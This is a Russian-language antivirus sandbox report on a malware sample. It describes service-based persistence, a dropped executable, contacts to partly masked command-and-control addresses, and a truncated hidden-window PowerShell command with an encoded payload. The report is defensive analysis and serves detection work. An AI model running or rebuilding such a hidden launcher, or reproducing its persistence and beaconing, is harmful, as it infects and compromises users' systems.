Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\edgetargets] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\edgetargets] 'ImagePath' = '"%WINDIR%\SysWOW64\edgetargets.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\924.exe
Перемещает следующие файлы
- %HOMEPATH%\924.exe в %WINDIR%\syswow64\edgetargets.exe
Сетевая активность
Подключается к
- '5.###.130.105':7080
- '91.##.197.90':80
- '68.##4.229.171':80
- '11#.#5.111.148':443
TCP
Запросы HTTP GET
- http://www.be####lpinghand.com/wp-admin/tsh4/
Запросы HTTP POST
- http://45.##.65.123:8080/NK4CCVM via 45.##.65.123
- http://21#.##0.19.232:8080/RNS3Dfkk06ZVcx via 21#.#60.19.232
- http://17#.#.43.37:8080/Aw78jYnu via 17#.9.43.37
UDP
- DNS ASK be####lpinghand.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\924.exe'
- '%WINDIR%\syswow64\edgetargets.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGYAZABoAHEAbAB6AGwAcgBrAD0AJwBVAGwAbgByAHIAcgBsAHcAYQB2AGcAbwAnADsAJABVAHcAaQBwAGgAdgB2AHYAZwBzAHkAIAA9ACAAJwA5ADIANAAnADsAJABOAHUAawB1AHoAYwBmAHMAYwBoAD0AJwBBAGwAYgBjAG0AZQB...' (со скрытым окном)
